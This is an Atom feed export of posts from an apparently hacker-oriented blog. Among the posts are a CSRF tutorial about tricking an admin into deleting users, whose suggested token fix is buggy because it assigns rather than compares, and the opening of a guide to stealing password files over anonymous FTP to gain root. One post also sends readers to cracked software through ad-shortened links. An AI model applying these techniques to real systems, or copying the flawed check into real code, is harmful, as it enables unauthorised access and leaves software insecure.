left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The script check if the admin is logged in so if we trick the admin to click&lt;br /&gt;our evil link the user who have the specified ID in the database will be deleted&lt;br /&gt;without any confirmation.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;13.2 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Simple way :&lt;/b&gt;&lt;/span&gt; &lt;i&gt;&lt;b&gt;Use tokens.At each login,generate a random token and save it&lt;br /&gt;in the session.Request the token in URL to do administrative&lt;br /&gt;actions,if the token missing or is wrong,don’t execute the&lt;br /&gt;action.I will show you only how to to check if the token&lt;br /&gt;is present and is correct.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;br /&gt;check_auth();&lt;br /&gt;if(isset($_GET[&#39;news&#39;]) &amp;amp;&amp;amp; $token=$_SESSION[&#39;token&#39;])&lt;br /&gt;{ unlink(‘files/news’.$news.’.txt’); }&lt;br /&gt;else {&lt;br /&gt;die(‘Error.’); }&lt;br /&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The request will look like this one :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/index.php?delete=1&amp;amp;token=[RANDOM_TOKEN]&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;So this request will be fine,the news will be deleted.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Another way :&lt;/b&gt;&lt;/span&gt; &lt;i&gt;&lt;b&gt;Do some complicated confirmations or request a password&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;to do administrative actions&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/8022099864926560800/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/find-0days-in-web-application.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/8022099864926560800'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/8022099864926560800'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/find-0days-in-web-application.html' title='Find 0day&#39;s vulnerabilities in web application'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-p9BYZVpIGnc/UVGddbrfCOI/AAAAAAAAAIQ/hIp91lqGZ7g/s72-c/images.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-1370495422605258830</id><published>2013-03-25T15:35:00.000+05:00</published><updated>2013-11-12T07:54:05.538+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="black hat hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="network penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="web application hacking"/><title type='text'>Black Hat Hacking Videos</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-QLgW6G5fQ1A/UVA9PyDrL1I/AAAAAAAAAIA/GQcd_Odx-vc/s1600/black.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-QLgW6G5fQ1A/UVA9PyDrL1I/AAAAAAAAAIA/GQcd_Odx-vc/s1600/black.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;So gu&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;i&gt;&lt;b&gt;ys i&#39;ve created a new page here with&lt;span style=&quot;font-size: large;&quot;&gt; a big collecti&lt;span style=&quot;font-size: large;&quot;&gt;on of Black Hat Videos provided by &quot;Bagus NewBie&quot; a very good friend of mine. Purpose of sharing th&lt;span style=&quot;font-size: large;&quot;&gt;ese videos is to aware people &lt;span style=&quot;font-size: large;&quot;&gt;how the hackers hac&lt;span style=&quot;font-size: large;&quot;&gt;k &lt;span style=&quot;font-size: large;&quot;&gt;into the System and web application. &lt;span style=&quot;font-size: large;&quot;&gt;Yes Web Application hacking an&lt;span style=&quot;font-size: large;&quot;&gt;d security&#39;s videos are also mention&lt;span style=&quot;font-size: large;&quot;&gt;ed&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;there&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt; &lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;so here is the direct link t&lt;span style=&quot;font-size: large;&quot;&gt;he page:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Click The Link Below:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;a href=&quot;http://www.blackleets.net/p/beginners-hacking-series.html&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/1370495422605258830/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/black-hat-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/1370495422605258830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/1370495422605258830'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/black-hat-hacking.html' title='Black Hat Hacking Videos'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-QLgW6G5fQ1A/UVA9PyDrL1I/AAAAAAAAAIA/GQcd_Odx-vc/s72-c/black.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-2243329719990044255</id><published>2013-03-22T15:18:00.001+05:00</published><updated>2013-11-12T07:54:37.722+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="anti-virus"/><category scheme="http://www.blogger.com/atom/ns#" term="computer tricks"/><category scheme="http://www.blogger.com/atom/ns#" term="pc speed"/><category scheme="http://www.blogger.com/atom/ns#" term="Virus"/><category scheme="http://www.blogger.com/atom/ns#" term="virus scan"/><title type='text'>Make your computer Faster like professionals</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-S5jhQnM_XEs/UUrlaSVVKgI/AAAAAAAAAE4/izay6S7fSDQ/s1600/How+to+Make+Your+Computer+Faster+Using+Notepad.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;167&quot; src=&quot;http://2.bp.blogspot.com/-S5jhQnM_XEs/UUrlaSVVKgI/AAAAAAAAAE4/izay6S7fSDQ/s320/How+to+Make+Your+Computer+Faster+Using+Notepad.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&amp;nbsp; &lt;span style=&quot;font-size: large;&quot;&gt;Well sometimes computer behaves strangely. Like hanging again and again when open up or install any program. sometimes this is because for viruses and harmful files in it. But what if it&#39;s still behaving same after scanning and removing the virus?&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;Seems like your hard derive might need defragement or temporary files are loaded too much or it night have some registry files corrupted.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;1. First what you should do is, run disc clean up by going to the system reserved derive (where your windows is installed). Right click on it and select properties and you will see a option &quot;disc cleanup&quot; &lt;br /&gt;Example:&lt;/span&gt;&lt;/h3&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-fBEyqjiFvEY/UUrlhNSMLaI/AAAAAAAAAFA/G4n5VinK0X8/s1600/Capture.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://1.bp.blogspot.com/-fBEyqjiFvEY/UUrlhNSMLaI/AAAAAAAAAFA/G4n5VinK0X8/s320/Capture.PNG&quot; width=&quot;239&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;span style=&quot;font-size: large;&quot;&gt;it will scan . give it some time.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;After it will show new window something like this:&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-jKUmLZ7cagA/UUrmlp23tEI/AAAAAAAAAFM/aHQahI-FRaY/s1600/Capture.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://3.bp.blogspot.com/-jKUmLZ7cagA/UUrmlp23tEI/AAAAAAAAAFM/aHQahI-FRaY/s320/Capture.PNG&quot; width=&quot;258&quot; /&gt;&lt;/a&gt;&lt;/h3&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;span style=&quot;font-size: large;&quot;&gt;click on clean up system files. it will ask your permission click ok and your disc will be leaned up.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;2. Ok after that you should run virus scan on your computer. You can choose any good antivirus of your choice. But I suggest or recommend you to use security essentials from Microsoft (for windows)&lt;/span&gt;&lt;/h3&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;Download Security Essentials:&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;&lt;a href=&quot;http://adf.ly/LOEgE&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;am not supposing to tell&lt;span style=&quot;font-size: large;&quot;&gt; &lt;span style=&quot;font-size: large;&quot;&gt;you how to i&lt;span style=&quot;font-size: large;&quot;&gt;nstall&lt;span style=&quot;font-size: large;&quot;&gt; and run it. But one thing i would like to mention that&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; your wi&lt;span style=&quot;font-size: large;&quot;&gt;ndows copy must be geniu&lt;span style=&quot;font-size: large;&quot;&gt;ne to install this and after &lt;span style=&quot;font-size: large;&quot;&gt;installing then first update this (Your computer must be connect&lt;span style=&quot;font-size: large;&quot;&gt;ed with &lt;span style=&quot;font-size: large;&quot;&gt;Internet to Update it&lt;/span&gt;&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Then run &quot;Custom Scan&quot; and after scanning &lt;span style=&quot;font-size: large;&quot;&gt;you will get some options&lt;span style=&quot;font-size: large;&quot;&gt;, sele&lt;span style=&quot;font-size: large;&quot;&gt;ct the option of your choice.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; It will cleanup all the harmful files from your computer to perform your PC well.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3. Ok final step is that there might be some registry files corrupted or something like that. That also can cause to slow down you pc speed. I Recommend another tool. &lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Download Advance system care:&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;a href=&quot;http://adf.ly/LOToZ&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;(&lt;span style=&quot;color: red;&quot;&gt;Special thanks to &quot; &lt;a href=&quot;https://www.facebook.com/Raja.jutt&quot; target=&quot;_blank&quot;&gt;Raja Zulqernain&lt;/a&gt; &quot; for providing this with keys. I recommend you to visit here on his blog &lt;a href=&quot;http://www.h4ck3rcracks.blogspot.com/&quot; target=&quot;_blank&quot;&gt;www.h4ck3rcracks.blogspot.com&lt;/a&gt; to get cracked tools and games&lt;/span&gt;)&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;*After downloading and installing. You will see window something like this:&lt;/span&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-IzRaDgoXxRo/UUwuIiu_dLI/AAAAAAAAAFc/OsnuK78GFhc/s1600/Capture.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;http://3.bp.blogspot.com/-IzRaDgoXxRo/UUwuIiu_dLI/AAAAAAAAAFc/OsnuK78GFhc/s320/Capture.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Did you see how many features it has ?&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ok now click on &quot;Scan Now&quot; as you can see in pic above. And wait a while until it scans the problems. After few minutes you will see new window something like this:&lt;/span&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-94pZPIrn3Y0/UUwuSwU0kFI/AAAAAAAAAFk/eP8Cc_VvPHY/s1600/2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;http://4.bp.blogspot.com/-94pZPIrn3Y0/UUwuSwU0kFI/AAAAAAAAAFk/eP8Cc_VvPHY/s320/2.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;If you get this message &quot;&lt;span style=&quot;color: red;&quot;&gt;some problems found&lt;/span&gt;&quot; then click on &quot;Repair Now&quot;.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;and I recommend to Restart Your computer after these operations and for sure your Pc speed will be increased as well.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Regards.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/2243329719990044255/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/make-your-computer-faster-like.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/2243329719990044255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/2243329719990044255'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/make-your-computer-faster-like.html' title='Make your computer Faster like professionals'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-S5jhQnM_XEs/UUrlaSVVKgI/AAAAAAAAAE4/izay6S7fSDQ/s72-c/How+to+Make+Your+Computer+Faster+Using+Notepad.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-2637576698427082311</id><published>2013-03-21T14:34:00.001+05:00</published><updated>2013-11-12T07:55:13.747+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="web application hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web application penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Penetration testing"/><title type='text'>Rooting Web Pages without Exploit</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;vb_postbit&quot; id=&quot;post_message_725780&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-pgItW4ZsrTY/UUxayy3XtHI/AAAAAAAAAF0/eDk6-Y2JPwM/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-pgItW4ZsrTY/UUxayy3XtHI/AAAAAAAAAF0/eDk6-Y2JPwM/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: darkorchid;&quot;&gt;&lt;b&gt;Autohrs of this tutorial : Virtual Circuit and Psychotic&lt;/b&gt;&lt;br /&gt; &lt;/span&gt;&lt;/span&gt; &lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt; &lt;br /&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt; &lt;br /&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;root:User:d7Bdg:1n2HG2:1127:20:Superuser&lt;/b&gt;&lt;br /&gt;&lt;b&gt;TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh&lt;/b&gt;&lt;br /&gt;&lt;b&gt;BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That&#39;s the main part of the file.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;root:x:0:1:Superuser:/:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;br /&gt;&lt;b&gt;ftp:x:202:102:Anonymous ftp:/u1/ftp:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;ftpadmin:x:203:102:ftp Administrator:/u1/ftp&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;This is another example of a password file, only this one has one little difference, it&#39;s shadowed.&lt;br /&gt;Shadowed password files don&#39;t let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text).&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Below is another example of a shadowed password file:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;root:x:0:1:0000-Admin(0000):/:/usr/bin/csh&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;br /&gt;&lt;b&gt;daemon:x:1:1:0000-Admin(0000):/:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;bin:x:2:2:0000-Admin(0000):/usr/bin:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;sys:x:3:3:0000-Admin(0000):/:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;adm:x:4:4:0000-Admin(0000):/var/adm:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;lp:x8:0000-lp(0000):/usr/spool/lp:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;smtp:x:0:0:mail daemon user:/:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/&lt;/b&gt;&lt;br /&gt;&lt;b&gt;uucico&lt;/b&gt;&lt;br /&gt;&lt;b&gt;listen:x:37:4:Network Admin:/usr/net/nls:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;nobody:x:60001:60001:uid no body:/:&lt;/b&gt;&lt;br 